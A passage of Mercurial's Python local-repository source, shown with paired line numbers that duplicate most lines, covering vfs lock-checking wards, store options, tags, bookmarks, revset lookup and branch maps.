426 self.spath = self.store.path
426 self.svfs = self.store.vfs
427 self.svfs = self.store.vfs
427 self.sjoin = self.store.join
428 self.sjoin = self.store.join
428 self.vfs.createmode = self.store.createmode
429 self.vfs.createmode = self.store.createmode
429 self.cachevfs = vfsmod.vfs(cachepath)
430 self.cachevfs = vfsmod.vfs(cachepath, cacheaudited=True)
430 self.cachevfs.createmode = self.store.createmode
431 self.cachevfs.createmode = self.store.createmode
431 if (self.ui.configbool('devel', 'all-warnings') or
432 if (self.ui.configbool('devel', 'all-warnings') or
432 self.ui.configbool('devel', 'check-locks')):
433 self.ui.configbool('devel', 'check-locks')):
433 if util.safehasattr(self.svfs, 'vfs'): # this is filtervfs
434 if util.safehasattr(self.svfs, 'vfs'): # this is filtervfs
434 self.svfs.vfs.audit = self._getsvfsward(self.svfs.vfs.audit)
435 self.svfs.vfs.audit = self._getsvfsward(self.svfs.vfs.audit)
435 else: # standard vfs
436 else: # standard vfs
436 self.svfs.audit = self._getsvfsward(self.svfs.audit)
437 self.svfs.audit = self._getsvfsward(self.svfs.audit)
437 self._applyopenerreqs()
438 self._applyopenerreqs()
438 if create:
439 if create:
439 self._writerequirements()
440 self._writerequirements()
440
441
441 self._dirstatevalidatewarned = False
442 self._dirstatevalidatewarned = False
442
443
443 self._branchcaches = {}
444 self._branchcaches = {}
444 self._revbranchcache = None
445 self._revbranchcache = None
445 self.filterpats = {}
446 self.filterpats = {}
446 self._datafilters = {}
447 self._datafilters = {}
447 self._transref = self._lockref = self._wlockref = None
448 self._transref = self._lockref = self._wlockref = None
448
449
449 # A cache for various files under .hg/ that tracks file changes,
450 # A cache for various files under .hg/ that tracks file changes,
450 # (used by the filecache decorator)
451 # (used by the filecache decorator)
451 #
452 #
452 # Maps a property name to its util.filecacheentry
453 # Maps a property name to its util.filecacheentry
453 self._filecache = {}
454 self._filecache = {}
454
455
455 # hold sets of revision to be filtered
456 # hold sets of revision to be filtered
456 # should be cleared when something might have changed the filter value:
457 # should be cleared when something might have changed the filter value:
457 # - new changesets,
458 # - new changesets,
458 # - phase change,
459 # - phase change,
459 # - new obsolescence marker,
460 # - new obsolescence marker,
460 # - working directory parent change,
461 # - working directory parent change,
461 # - bookmark changes
462 # - bookmark changes
462 self.filteredrevcache = {}
463 self.filteredrevcache = {}
463
464
464 # post-dirstate-status hooks
465 # post-dirstate-status hooks
465 self._postdsstatus = []
466 self._postdsstatus = []
466
467
467 # Cache of types representing filtered repos.
468 # Cache of types representing filtered repos.
468 self._filteredrepotypes = weakref.WeakKeyDictionary()
469 self._filteredrepotypes = weakref.WeakKeyDictionary()
469
470
470 # generic mapping between names and nodes
471 # generic mapping between names and nodes
471 self.names = namespaces.namespaces()
472 self.names = namespaces.namespaces()
472
473
473 # Key to signature value.
474 # Key to signature value.
474 self._sparsesignaturecache = {}
475 self._sparsesignaturecache = {}
475 # Signature to cached matcher instance.
476 # Signature to cached matcher instance.
476 self._sparsematchercache = {}
477 self._sparsematchercache = {}
477
478
478 def _getvfsward(self, origfunc):
479 def _getvfsward(self, origfunc):
479 """build a ward for self.vfs"""
480 """build a ward for self.vfs"""
480 rref = weakref.ref(self)
481 rref = weakref.ref(self)
481 def checkvfs(path, mode=None):
482 def checkvfs(path, mode=None):
482 ret = origfunc(path, mode=mode)
483 ret = origfunc(path, mode=mode)
483 repo = rref()
484 repo = rref()
484 if (repo is None
485 if (repo is None
485 or not util.safehasattr(repo, '_wlockref')
486 or not util.safehasattr(repo, '_wlockref')
486 or not util.safehasattr(repo, '_lockref')):
487 or not util.safehasattr(repo, '_lockref')):
487 return
488 return
488 if mode in (None, 'r', 'rb'):
489 if mode in (None, 'r', 'rb'):
489 return
490 return
490 if path.startswith(repo.path):
491 if path.startswith(repo.path):
491 # truncate name relative to the repository (.hg)
492 # truncate name relative to the repository (.hg)
492 path = path[len(repo.path) + 1:]
493 path = path[len(repo.path) + 1:]
493 if path.startswith('cache/'):
494 if path.startswith('cache/'):
494 msg = 'accessing cache with vfs instead of cachevfs: "%s"'
495 msg = 'accessing cache with vfs instead of cachevfs: "%s"'
495 repo.ui.develwarn(msg % path, stacklevel=2, config="cache-vfs")
496 repo.ui.develwarn(msg % path, stacklevel=2, config="cache-vfs")
496 if path.startswith('journal.'):
497 if path.startswith('journal.'):
497 # journal is covered by 'lock'
498 # journal is covered by 'lock'
498 if repo._currentlock(repo._lockref) is None:
499 if repo._currentlock(repo._lockref) is None:
499 repo.ui.develwarn('write with no lock: "%s"' % path,
500 repo.ui.develwarn('write with no lock: "%s"' % path,
500 stacklevel=2, config='check-locks')
501 stacklevel=2, config='check-locks')
501 elif repo._currentlock(repo._wlockref) is None:
502 elif repo._currentlock(repo._wlockref) is None:
502 # rest of vfs files are covered by 'wlock'
503 # rest of vfs files are covered by 'wlock'
503 #
504 #
504 # exclude special files
505 # exclude special files
505 for prefix in self._wlockfreeprefix:
506 for prefix in self._wlockfreeprefix:
506 if path.startswith(prefix):
507 if path.startswith(prefix):
507 return
508 return
508 repo.ui.develwarn('write with no wlock: "%s"' % path,
509 repo.ui.develwarn('write with no wlock: "%s"' % path,
509 stacklevel=2, config='check-locks')
510 stacklevel=2, config='check-locks')
510 return ret
511 return ret
511 return checkvfs
512 return checkvfs
512
513
513 def _getsvfsward(self, origfunc):
514 def _getsvfsward(self, origfunc):
514 """build a ward for self.svfs"""
515 """build a ward for self.svfs"""
515 rref = weakref.ref(self)
516 rref = weakref.ref(self)
516 def checksvfs(path, mode=None):
517 def checksvfs(path, mode=None):
517 ret = origfunc(path, mode=mode)
518 ret = origfunc(path, mode=mode)
518 repo = rref()
519 repo = rref()
519 if repo is None or not util.safehasattr(repo, '_lockref'):
520 if repo is None or not util.safehasattr(repo, '_lockref'):
520 return
521 return
521 if mode in (None, 'r', 'rb'):
522 if mode in (None, 'r', 'rb'):
522 return
523 return
523 if path.startswith(repo.sharedpath):
524 if path.startswith(repo.sharedpath):
524 # truncate name relative to the repository (.hg)
525 # truncate name relative to the repository (.hg)
525 path = path[len(repo.sharedpath) + 1:]
526 path = path[len(repo.sharedpath) + 1:]
526 if repo._currentlock(repo._lockref) is None:
527 if repo._currentlock(repo._lockref) is None:
527 repo.ui.develwarn('write with no lock: "%s"' % path,
528 repo.ui.develwarn('write with no lock: "%s"' % path,
528 stacklevel=3)
529 stacklevel=3)
529 return ret
530 return ret
530 return checksvfs
531 return checksvfs
531
532
532 def close(self):
533 def close(self):
533 self._writecaches()
534 self._writecaches()
534
535
535 def _loadextensions(self):
536 def _loadextensions(self):
536 extensions.loadall(self.ui)
537 extensions.loadall(self.ui)
537
538
538 def _writecaches(self):
539 def _writecaches(self):
539 if self._revbranchcache:
540 if self._revbranchcache:
540 self._revbranchcache.write()
541 self._revbranchcache.write()
541
542
542 def _restrictcapabilities(self, caps):
543 def _restrictcapabilities(self, caps):
543 if self.ui.configbool('experimental', 'bundle2-advertise'):
544 if self.ui.configbool('experimental', 'bundle2-advertise'):
544 caps = set(caps)
545 caps = set(caps)
545 capsblob = bundle2.encodecaps(bundle2.getrepocaps(self))
546 capsblob = bundle2.encodecaps(bundle2.getrepocaps(self))
546 caps.add('bundle2=' + urlreq.quote(capsblob))
547 caps.add('bundle2=' + urlreq.quote(capsblob))
547 return caps
548 return caps
548
549
549 def _applyopenerreqs(self):
550 def _applyopenerreqs(self):
550 self.svfs.options = dict((r, 1) for r in self.requirements
551 self.svfs.options = dict((r, 1) for r in self.requirements
551 if r in self.openerreqs)
552 if r in self.openerreqs)
552 # experimental config: format.chunkcachesize
553 # experimental config: format.chunkcachesize
553 chunkcachesize = self.ui.configint('format', 'chunkcachesize')
554 chunkcachesize = self.ui.configint('format', 'chunkcachesize')
554 if chunkcachesize is not None:
555 if chunkcachesize is not None:
555 self.svfs.options['chunkcachesize'] = chunkcachesize
556 self.svfs.options['chunkcachesize'] = chunkcachesize
556 # experimental config: format.maxchainlen
557 # experimental config: format.maxchainlen
557 maxchainlen = self.ui.configint('format', 'maxchainlen')
558 maxchainlen = self.ui.configint('format', 'maxchainlen')
558 if maxchainlen is not None:
559 if maxchainlen is not None:
559 self.svfs.options['maxchainlen'] = maxchainlen
560 self.svfs.options['maxchainlen'] = maxchainlen
560 # experimental config: format.manifestcachesize
561 # experimental config: format.manifestcachesize
561 manifestcachesize = self.ui.configint('format', 'manifestcachesize')
562 manifestcachesize = self.ui.configint('format', 'manifestcachesize')
562 if manifestcachesize is not None:
563 if manifestcachesize is not None:
563 self.svfs.options['manifestcachesize'] = manifestcachesize
564 self.svfs.options['manifestcachesize'] = manifestcachesize
564 # experimental config: format.aggressivemergedeltas
565 # experimental config: format.aggressivemergedeltas
565 aggressivemergedeltas = self.ui.configbool('format',
566 aggressivemergedeltas = self.ui.configbool('format',
566 'aggressivemergedeltas')
567 'aggressivemergedeltas')
567 self.svfs.options['aggressivemergedeltas'] = aggressivemergedeltas
568 self.svfs.options['aggressivemergedeltas'] = aggressivemergedeltas
568 self.svfs.options['lazydeltabase'] = not scmutil.gddeltaconfig(self.ui)
569 self.svfs.options['lazydeltabase'] = not scmutil.gddeltaconfig(self.ui)
569 chainspan = self.ui.configbytes('experimental', 'maxdeltachainspan', -1)
570 chainspan = self.ui.configbytes('experimental', 'maxdeltachainspan', -1)
570 if 0 <= chainspan:
571 if 0 <= chainspan:
571 self.svfs.options['maxdeltachainspan'] = chainspan
572 self.svfs.options['maxdeltachainspan'] = chainspan
572
573
573 for r in self.requirements:
574 for r in self.requirements:
574 if r.startswith('exp-compression-'):
575 if r.startswith('exp-compression-'):
575 self.svfs.options['compengine'] = r[len('exp-compression-'):]
576 self.svfs.options['compengine'] = r[len('exp-compression-'):]
576
577
577 # TODO move "revlogv2" to openerreqs once finalized.
578 # TODO move "revlogv2" to openerreqs once finalized.
578 if REVLOGV2_REQUIREMENT in self.requirements:
579 if REVLOGV2_REQUIREMENT in self.requirements:
579 self.svfs.options['revlogv2'] = True
580 self.svfs.options['revlogv2'] = True
580
581
581 def _writerequirements(self):
582 def _writerequirements(self):
582 scmutil.writerequires(self.vfs, self.requirements)
583 scmutil.writerequires(self.vfs, self.requirements)
583
584
584 def _checknested(self, path):
585 def _checknested(self, path):
585 """Determine if path is a legal nested repository."""
586 """Determine if path is a legal nested repository."""
586 if not path.startswith(self.root):
587 if not path.startswith(self.root):
587 return False
588 return False
588 subpath = path[len(self.root) + 1:]
589 subpath = path[len(self.root) + 1:]
589 normsubpath = util.pconvert(subpath)
590 normsubpath = util.pconvert(subpath)
590
591
591 # XXX: Checking against the current working copy is wrong in
592 # XXX: Checking against the current working copy is wrong in
592 # the sense that it can reject things like
593 # the sense that it can reject things like
593 #
594 #
594 # $ hg cat -r 10 sub/x.txt
595 # $ hg cat -r 10 sub/x.txt
595 #
596 #
596 # if sub/ is no longer a subrepository in the working copy
597 # if sub/ is no longer a subrepository in the working copy
597 # parent revision.
598 # parent revision.
598 #
599 #
599 # However, it can of course also allow things that would have
600 # However, it can of course also allow things that would have
600 # been rejected before, such as the above cat command if sub/
601 # been rejected before, such as the above cat command if sub/
601 # is a subrepository now, but was a normal directory before.
602 # is a subrepository now, but was a normal directory before.
602 # The old path auditor would have rejected by mistake since it
603 # The old path auditor would have rejected by mistake since it
603 # panics when it sees sub/.hg/.
604 # panics when it sees sub/.hg/.
604 #
605 #
605 # All in all, checking against the working copy seems sensible
606 # All in all, checking against the working copy seems sensible
606 # since we want to prevent access to nested repositories on
607 # since we want to prevent access to nested repositories on
607 # the filesystem *now*.
608 # the filesystem *now*.
608 ctx = self[None]
609 ctx = self[None]
609 parts = util.splitpath(subpath)
610 parts = util.splitpath(subpath)
610 while parts:
611 while parts:
611 prefix = '/'.join(parts)
612 prefix = '/'.join(parts)
612 if prefix in ctx.substate:
613 if prefix in ctx.substate:
613 if prefix == normsubpath:
614 if prefix == normsubpath:
614 return True
615 return True
615 else:
616 else:
616 sub = ctx.sub(prefix)
617 sub = ctx.sub(prefix)
617 return sub.checknested(subpath[len(prefix) + 1:])
618 return sub.checknested(subpath[len(prefix) + 1:])
618 else:
619 else:
619 parts.pop()
620 parts.pop()
620 return False
621 return False
621
622
622 def peer(self):
623 def peer(self):
623 return localpeer(self) # not cached to avoid reference cycle
624 return localpeer(self) # not cached to avoid reference cycle
624
625
625 def unfiltered(self):
626 def unfiltered(self):
626 """Return unfiltered version of the repository
627 """Return unfiltered version of the repository
627
628
628 Intended to be overwritten by filtered repo."""
629 Intended to be overwritten by filtered repo."""
629 return self
630 return self
630
631
631 def filtered(self, name):
632 def filtered(self, name):
632 """Return a filtered version of a repository"""
633 """Return a filtered version of a repository"""
633 # Python <3.4 easily leaks types via __mro__. See
634 # Python <3.4 easily leaks types via __mro__. See
634 # https://bugs.python.org/issue17950. We cache dynamically
635 # https://bugs.python.org/issue17950. We cache dynamically
635 # created types so this method doesn't leak on every
636 # created types so this method doesn't leak on every
636 # invocation.
637 # invocation.
637
638
638 key = self.unfiltered().__class__
639 key = self.unfiltered().__class__
639 if key not in self._filteredrepotypes:
640 if key not in self._filteredrepotypes:
640 # Build a new type with the repoview mixin and the base
641 # Build a new type with the repoview mixin and the base
641 # class of this repo. Give it a name containing the
642 # class of this repo. Give it a name containing the
642 # filter name to aid debugging.
643 # filter name to aid debugging.
643 bases = (repoview.repoview, key)
644 bases = (repoview.repoview, key)
644 cls = type(r'%sfilteredrepo' % name, bases, {})
645 cls = type(r'%sfilteredrepo' % name, bases, {})
645 self._filteredrepotypes[key] = cls
646 self._filteredrepotypes[key] = cls
646
647
647 return self._filteredrepotypes[key](self, name)
648 return self._filteredrepotypes[key](self, name)
648
649
649 @repofilecache('bookmarks', 'bookmarks.current')
650 @repofilecache('bookmarks', 'bookmarks.current')
650 def _bookmarks(self):
651 def _bookmarks(self):
651 return bookmarks.bmstore(self)
652 return bookmarks.bmstore(self)
652
653
653 @property
654 @property
654 def _activebookmark(self):
655 def _activebookmark(self):
655 return self._bookmarks.active
656 return self._bookmarks.active
656
657
657 # _phaserevs and _phasesets depend on changelog. what we need is to
658 # _phaserevs and _phasesets depend on changelog. what we need is to
658 # call _phasecache.invalidate() if '00changelog.i' was changed, but it
659 # call _phasecache.invalidate() if '00changelog.i' was changed, but it
659 # can't be easily expressed in filecache mechanism.
660 # can't be easily expressed in filecache mechanism.
660 @storecache('phaseroots', '00changelog.i')
661 @storecache('phaseroots', '00changelog.i')
661 def _phasecache(self):
662 def _phasecache(self):
662 return phases.phasecache(self, self._phasedefaults)
663 return phases.phasecache(self, self._phasedefaults)
663
664
664 @storecache('obsstore')
665 @storecache('obsstore')
665 def obsstore(self):
666 def obsstore(self):
666 return obsolete.makestore(self.ui, self)
667 return obsolete.makestore(self.ui, self)
667
668
668 @storecache('00changelog.i')
669 @storecache('00changelog.i')
669 def changelog(self):
670 def changelog(self):
670 return changelog.changelog(self.svfs,
671 return changelog.changelog(self.svfs,
671 trypending=txnutil.mayhavepending(self.root))
672 trypending=txnutil.mayhavepending(self.root))
672
673
673 def _constructmanifest(self):
674 def _constructmanifest(self):
674 # This is a temporary function while we migrate from manifest to
675 # This is a temporary function while we migrate from manifest to
675 # manifestlog. It allows bundlerepo and unionrepo to intercept the
676 # manifestlog. It allows bundlerepo and unionrepo to intercept the
676 # manifest creation.
677 # manifest creation.
677 return manifest.manifestrevlog(self.svfs)
678 return manifest.manifestrevlog(self.svfs)
678
679
679 @storecache('00manifest.i')
680 @storecache('00manifest.i')
680 def manifestlog(self):
681 def manifestlog(self):
681 return manifest.manifestlog(self.svfs, self)
682 return manifest.manifestlog(self.svfs, self)
682
683
683 @repofilecache('dirstate')
684 @repofilecache('dirstate')
684 def dirstate(self):
685 def dirstate(self):
685 sparsematchfn = lambda: sparse.matcher(self)
686 sparsematchfn = lambda: sparse.matcher(self)
686
687
687 return dirstate.dirstate(self.vfs, self.ui, self.root,
688 return dirstate.dirstate(self.vfs, self.ui, self.root,
688 self._dirstatevalidate, sparsematchfn)
689 self._dirstatevalidate, sparsematchfn)
689
690
690 def _dirstatevalidate(self, node):
691 def _dirstatevalidate(self, node):
691 try:
692 try:
692 self.changelog.rev(node)
693 self.changelog.rev(node)
693 return node
694 return node
694 except error.LookupError:
695 except error.LookupError:
695 if not self._dirstatevalidatewarned:
696 if not self._dirstatevalidatewarned:
696 self._dirstatevalidatewarned = True
697 self._dirstatevalidatewarned = True
697 self.ui.warn(_("warning: ignoring unknown"
698 self.ui.warn(_("warning: ignoring unknown"
698 " working parent %s!\n") % short(node))
699 " working parent %s!\n") % short(node))
699 return nullid
700 return nullid
700
701
701 def __getitem__(self, changeid):
702 def __getitem__(self, changeid):
702 if changeid is None:
703 if changeid is None:
703 return context.workingctx(self)
704 return context.workingctx(self)
704 if isinstance(changeid, slice):
705 if isinstance(changeid, slice):
705 # wdirrev isn't contiguous so the slice shouldn't include it
706 # wdirrev isn't contiguous so the slice shouldn't include it
706 return [context.changectx(self, i)
707 return [context.changectx(self, i)
707 for i in xrange(*changeid.indices(len(self)))
708 for i in xrange(*changeid.indices(len(self)))
708 if i not in self.changelog.filteredrevs]
709 if i not in self.changelog.filteredrevs]
709 try:
710 try:
710 return context.changectx(self, changeid)
711 return context.changectx(self, changeid)
711 except error.WdirUnsupported:
712 except error.WdirUnsupported:
712 return context.workingctx(self)
713 return context.workingctx(self)
713
714
714 def __contains__(self, changeid):
715 def __contains__(self, changeid):
715 """True if the given changeid exists
716 """True if the given changeid exists
716
717
717 error.LookupError is raised if an ambiguous node specified.
718 error.LookupError is raised if an ambiguous node specified.
718 """
719 """
719 try:
720 try:
720 self[changeid]
721 self[changeid]
721 return True
722 return True
722 except error.RepoLookupError:
723 except error.RepoLookupError:
723 return False
724 return False
724
725
725 def __nonzero__(self):
726 def __nonzero__(self):
726 return True
727 return True
727
728
728 __bool__ = __nonzero__
729 __bool__ = __nonzero__
729
730
730 def __len__(self):
731 def __len__(self):
731 return len(self.changelog)
732 return len(self.changelog)
732
733
733 def __iter__(self):
734 def __iter__(self):
734 return iter(self.changelog)
735 return iter(self.changelog)
735
736
736 def revs(self, expr, *args):
737 def revs(self, expr, *args):
737 '''Find revisions matching a revset.
738 '''Find revisions matching a revset.
738
739
739 The revset is specified as a string ``expr`` that may contain
740 The revset is specified as a string ``expr`` that may contain
740 %-formatting to escape certain types. See ``revsetlang.formatspec``.
741 %-formatting to escape certain types. See ``revsetlang.formatspec``.
741
742
742 Revset aliases from the configuration are not expanded. To expand
743 Revset aliases from the configuration are not expanded. To expand
743 user aliases, consider calling ``scmutil.revrange()`` or
744 user aliases, consider calling ``scmutil.revrange()`` or
744 ``repo.anyrevs([expr], user=True)``.
745 ``repo.anyrevs([expr], user=True)``.
745
746
746 Returns a revset.abstractsmartset, which is a list-like interface
747 Returns a revset.abstractsmartset, which is a list-like interface
747 that contains integer revisions.
748 that contains integer revisions.
748 '''
749 '''
749 expr = revsetlang.formatspec(expr, *args)
750 expr = revsetlang.formatspec(expr, *args)
750 m = revset.match(None, expr)
751 m = revset.match(None, expr)
751 return m(self)
752 return m(self)
752
753
753 def set(self, expr, *args):
754 def set(self, expr, *args):
754 '''Find revisions matching a revset and emit changectx instances.
755 '''Find revisions matching a revset and emit changectx instances.
755
756
756 This is a convenience wrapper around ``revs()`` that iterates the
757 This is a convenience wrapper around ``revs()`` that iterates the
757 result and is a generator of changectx instances.
758 result and is a generator of changectx instances.
758
759
759 Revset aliases from the configuration are not expanded. To expand
760 Revset aliases from the configuration are not expanded. To expand
760 user aliases, consider calling ``scmutil.revrange()``.
761 user aliases, consider calling ``scmutil.revrange()``.
761 '''
762 '''
762 for r in self.revs(expr, *args):
763 for r in self.revs(expr, *args):
763 yield self[r]
764 yield self[r]
764
765
765 def anyrevs(self, specs, user=False, localalias=None):
766 def anyrevs(self, specs, user=False, localalias=None):
766 '''Find revisions matching one of the given revsets.
767 '''Find revisions matching one of the given revsets.
767
768
768 Revset aliases from the configuration are not expanded by default. To
769 Revset aliases from the configuration are not expanded by default. To
769 expand user aliases, specify ``user=True``. To provide some local
770 expand user aliases, specify ``user=True``. To provide some local
770 definitions overriding user aliases, set ``localalias`` to
771 definitions overriding user aliases, set ``localalias`` to
771 ``{name: definitionstring}``.
772 ``{name: definitionstring}``.
772 '''
773 '''
773 if user:
774 if user:
774 m = revset.matchany(self.ui, specs, repo=self,
775 m = revset.matchany(self.ui, specs, repo=self,
775 localalias=localalias)
776 localalias=localalias)
776 else:
777 else:
777 m = revset.matchany(None, specs, localalias=localalias)
778 m = revset.matchany(None, specs, localalias=localalias)
778 return m(self)
779 return m(self)
779
780
780 def url(self):
781 def url(self):
781 return 'file:' + self.root
782 return 'file:' + self.root
782
783
783 def hook(self, name, throw=False, **args):
784 def hook(self, name, throw=False, **args):
784 """Call a hook, passing this repo instance.
785 """Call a hook, passing this repo instance.
785
786
786 This a convenience method to aid invoking hooks. Extensions likely
787 This a convenience method to aid invoking hooks. Extensions likely
787 won't call this unless they have registered a custom hook or are
788 won't call this unless they have registered a custom hook or are
788 replacing code that is expected to call a hook.
789 replacing code that is expected to call a hook.
789 """
790 """
790 return hook.hook(self.ui, self, name, throw, **args)
791 return hook.hook(self.ui, self, name, throw, **args)
791
792
792 @filteredpropertycache
793 @filteredpropertycache
793 def _tagscache(self):
794 def _tagscache(self):
794 '''Returns a tagscache object that contains various tags related
795 '''Returns a tagscache object that contains various tags related
795 caches.'''
796 caches.'''
796
797
797 # This simplifies its cache management by having one decorated
798 # This simplifies its cache management by having one decorated
798 # function (this one) and the rest simply fetch things from it.
799 # function (this one) and the rest simply fetch things from it.
799 class tagscache(object):
800 class tagscache(object):
800 def __init__(self):
801 def __init__(self):
801 # These two define the set of tags for this repository. tags
802 # These two define the set of tags for this repository. tags
802 # maps tag name to node; tagtypes maps tag name to 'global' or
803 # maps tag name to node; tagtypes maps tag name to 'global' or
803 # 'local'. (Global tags are defined by .hgtags across all
804 # 'local'. (Global tags are defined by .hgtags across all
804 # heads, and local tags are defined in .hg/localtags.)
805 # heads, and local tags are defined in .hg/localtags.)
805 # They constitute the in-memory cache of tags.
806 # They constitute the in-memory cache of tags.
806 self.tags = self.tagtypes = None
807 self.tags = self.tagtypes = None
807
808
808 self.nodetagscache = self.tagslist = None
809 self.nodetagscache = self.tagslist = None
809
810
810 cache = tagscache()
811 cache = tagscache()
811 cache.tags, cache.tagtypes = self._findtags()
812 cache.tags, cache.tagtypes = self._findtags()
812
813
813 return cache
814 return cache
814
815
815 def tags(self):
816 def tags(self):
816 '''return a mapping of tag to node'''
817 '''return a mapping of tag to node'''
817 t = {}
818 t = {}
818 if self.changelog.filteredrevs:
819 if self.changelog.filteredrevs:
819 tags, tt = self._findtags()
820 tags, tt = self._findtags()
820 else:
821 else:
821 tags = self._tagscache.tags
822 tags = self._tagscache.tags
822 for k, v in tags.iteritems():
823 for k, v in tags.iteritems():
823 try:
824 try:
824 # ignore tags to unknown nodes
825 # ignore tags to unknown nodes
825 self.changelog.rev(v)
826 self.changelog.rev(v)
826 t[k] = v
827 t[k] = v
827 except (error.LookupError, ValueError):
828 except (error.LookupError, ValueError):
828 pass
829 pass
829 return t
830 return t
830
831
831 def _findtags(self):
832 def _findtags(self):
832 '''Do the hard work of finding tags. Return a pair of dicts
833 '''Do the hard work of finding tags. Return a pair of dicts
833 (tags, tagtypes) where tags maps tag name to node, and tagtypes
834 (tags, tagtypes) where tags maps tag name to node, and tagtypes
834 maps tag name to a string like \'global\' or \'local\'.
835 maps tag name to a string like \'global\' or \'local\'.
835 Subclasses or extensions are free to add their own tags, but
836 Subclasses or extensions are free to add their own tags, but
836 should be aware that the returned dicts will be retained for the
837 should be aware that the returned dicts will be retained for the
837 duration of the localrepo object.'''
838 duration of the localrepo object.'''
838
839
839 # XXX what tagtype should subclasses/extensions use? Currently
840 # XXX what tagtype should subclasses/extensions use? Currently
840 # mq and bookmarks add tags, but do not set the tagtype at all.
841 # mq and bookmarks add tags, but do not set the tagtype at all.
841 # Should each extension invent its own tag type? Should there
842 # Should each extension invent its own tag type? Should there
842 # be one tagtype for all such "virtual" tags? Or is the status
843 # be one tagtype for all such "virtual" tags? Or is the status
843 # quo fine?
844 # quo fine?
844
845
845
846
846 # map tag name to (node, hist)
847 # map tag name to (node, hist)
847 alltags = tagsmod.findglobaltags(self.ui, self)
848 alltags = tagsmod.findglobaltags(self.ui, self)
848 # map tag name to tag type
849 # map tag name to tag type
849 tagtypes = dict((tag, 'global') for tag in alltags)
850 tagtypes = dict((tag, 'global') for tag in alltags)
850
851
851 tagsmod.readlocaltags(self.ui, self, alltags, tagtypes)
852 tagsmod.readlocaltags(self.ui, self, alltags, tagtypes)
852
853
853 # Build the return dicts. Have to re-encode tag names because
854 # Build the return dicts. Have to re-encode tag names because
854 # the tags module always uses UTF-8 (in order not to lose info
855 # the tags module always uses UTF-8 (in order not to lose info
855 # writing to the cache), but the rest of Mercurial wants them in
856 # writing to the cache), but the rest of Mercurial wants them in
856 # local encoding.
857 # local encoding.
857 tags = {}
858 tags = {}
858 for (name, (node, hist)) in alltags.iteritems():
859 for (name, (node, hist)) in alltags.iteritems():
859 if node != nullid:
860 if node != nullid:
860 tags[encoding.tolocal(name)] = node
861 tags[encoding.tolocal(name)] = node
861 tags['tip'] = self.changelog.tip()
862 tags['tip'] = self.changelog.tip()
862 tagtypes = dict([(encoding.tolocal(name), value)
863 tagtypes = dict([(encoding.tolocal(name), value)
863 for (name, value) in tagtypes.iteritems()])
864 for (name, value) in tagtypes.iteritems()])
864 return (tags, tagtypes)
865 return (tags, tagtypes)
865
866
866 def tagtype(self, tagname):
867 def tagtype(self, tagname):
867 '''
868 '''
868 return the type of the given tag. result can be:
869 return the type of the given tag. result can be:
869
870
870 'local' : a local tag
871 'local' : a local tag
871 'global' : a global tag
872 'global' : a global tag
872 None : tag does not exist
873 None : tag does not exist
873 '''
874 '''
874
875
875 return self._tagscache.tagtypes.get(tagname)
876 return self._tagscache.tagtypes.get(tagname)
876
877
877 def tagslist(self):
878 def tagslist(self):
878 '''return a list of tags ordered by revision'''
879 '''return a list of tags ordered by revision'''
879 if not self._tagscache.tagslist:
880 if not self._tagscache.tagslist:
880 l = []
881 l = []
881 for t, n in self.tags().iteritems():
882 for t, n in self.tags().iteritems():
882 l.append((self.changelog.rev(n), t, n))
883 l.append((self.changelog.rev(n), t, n))
883 self._tagscache.tagslist = [(t, n) for r, t, n in sorted(l)]
884 self._tagscache.tagslist = [(t, n) for r, t, n in sorted(l)]
884
885
885 return self._tagscache.tagslist
886 return self._tagscache.tagslist
886
887
887 def nodetags(self, node):
888 def nodetags(self, node):
888 '''return the tags associated with a node'''
889 '''return the tags associated with a node'''
889 if not self._tagscache.nodetagscache:
890 if not self._tagscache.nodetagscache:
890 nodetagscache = {}
891 nodetagscache = {}
891 for t, n in self._tagscache.tags.iteritems():
892 for t, n in self._tagscache.tags.iteritems():
892 nodetagscache.setdefault(n, []).append(t)
893 nodetagscache.setdefault(n, []).append(t)
893 for tags in nodetagscache.itervalues():
894 for tags in nodetagscache.itervalues():
894 tags.sort()
895 tags.sort()
895 self._tagscache.nodetagscache = nodetagscache
896 self._tagscache.nodetagscache = nodetagscache
896 return self._tagscache.nodetagscache.get(node, [])
897 return self._tagscache.nodetagscache.get(node, [])
897
898
898 def nodebookmarks(self, node):
899 def nodebookmarks(self, node):
899 """return the list of bookmarks pointing to the specified node"""
900 """return the list of bookmarks pointing to the specified node"""
900 marks = []
901 marks = []
901 for bookmark, n in self._bookmarks.iteritems():
902 for bookmark, n in self._bookmarks.iteritems():
902 if n == node:
903 if n == node:
903 marks.append(bookmark)
904 marks.append(bookmark)
904 return sorted(marks)
905 return sorted(marks)
905
906
906 def branchmap(self):
907 def branchmap(self):
907 '''returns a dictionary {branch: [branchheads]} with branchheads
908 '''returns a dictionary {branch: [branchheads]} with branchheads
908 ordered by increasing revision number'''
909 ordered by increasing revision number'''
909 branchmap.updatecache(self)
910 branchmap.updatecache(self)
910 return self._branchcaches[self.filtername]
911 return self._branchcaches[self.filtername]
911
912
912 @unfilteredmethod
913 @unfilteredmethod
913 def revbranchcache(self):
914 def revbranchcache(self):
914 if not self._revbranchcache:
915 if not self._revbranchcache:
915 self._revbranchcache = branchmap.revbranchcache(self.unfiltered())
916 self._revbranchcache = branchmap.revbranchcache(self.unfiltered())
916 return self._revbranchcache
917 return self._revbranchcache
917
918
918 def branchtip(self, branch, ignoremissing=False):
919 def branchtip(self, branch, ignoremissing=False):
919 '''return the tip node for a given branch
920 '''return the tip node for a given branch
920
921
921 If ignoremissing is True, then this method will not raise an error.
922 If ignoremissing is True, then this method will not raise an error.
922 This is helpful for callers that only expect None for a missing branch
923 This is helpful for callers that only expect None for a missing branch
923 (e.g. namespace).
924 (e.g. namespace).
924
925
925 '''
926 '''
926 try:
927 try:
927 return self.branchmap().branchtip(branch)
928 return self.branchmap().branchtip(branch)
928 except KeyError:
929 except KeyError:
929 if not ignoremissing:
930 if not ignoremissing:
930 raise error.RepoLookupError(_("unknown branch '%s'") % branch)
931 raise error.RepoLookupError(_("unknown branch '%s'") % branch)
931 else:
932 else:
932 pass
933 pass
933
934
934 def lookup(self, key):
935 def lookup(self, key):
935 return self[key].node()
936 return self[key].node()
936
937
937 def lookupbranch(self, key, remote=None):
938 def lookupbranch(self, key, remote=None):
938 repo = remote or self
939 repo = remote or self
939 if key in repo.branchmap():
940 if key in repo.branchmap():
940 return key
941 return key
941
942
942 repo = (remote and remote.local()) and remote or self
943 repo = (remote and remote.local()) and remote or self
943 return repo[key].branch()
944 return repo[key].branch()
944
945
945 def known(self, nodes):
946 def known(self, nodes):
946 cl = self.changelog
947 cl = self.changelog
947 nm = cl.nodemap
948 nm = cl.nodemap
948 filtered = cl.filteredrevs
